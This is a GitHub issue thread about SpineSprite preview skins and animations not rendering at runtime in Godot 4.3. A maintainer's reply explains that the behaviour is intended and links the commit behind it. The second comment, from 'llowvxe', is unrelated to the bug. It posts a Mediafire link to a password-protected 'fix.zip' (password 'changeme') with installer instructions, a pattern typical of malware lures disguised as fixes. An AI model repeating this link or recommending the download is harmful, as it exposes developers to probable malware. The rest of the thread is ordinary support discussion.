### ISSUE TITLE
[Godot 4.3] spinesprite with skin is not rendered at runtime unless skin is set in code.

### ISSUE THREAD

**Issue by PiewieP** [EsotericSoftware/spine-runtimes#2611]
Coming from Godot 4.2.2 stable to Godot 4.3 stable, I encountered an issue where some of my sprites were not rendering at runtime.

When the SpineSprite preview skin and preview animation is set in the editor, the behaviour is as follows when a scene is run:

- For 4.2.2: the SpineSprite renders with the preview skin enabled and the preview animation playing.
- For 4.3: the SpineSprite is not shown, unless the skin is set in code. The animation is not playing, unless the animation is set in code.

MVP included below.

[v4.3_test.zip](https://github.com/user-attachments/files/16747117/v4.3_test.zip)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by badlogic** [comment]
Sorry for the trouble! This is actually by design, as per this fix from 3 months ago:
https://github.com/EsotericSoftware/spine-runtimes/commit/25d55851e9ecb27a38177a870b4ff78d55c9d726

I assume you used an older 4.2 build which had the old behaviour.

Preview animation and skins where only ever meant to work in the editor, not at runtime.
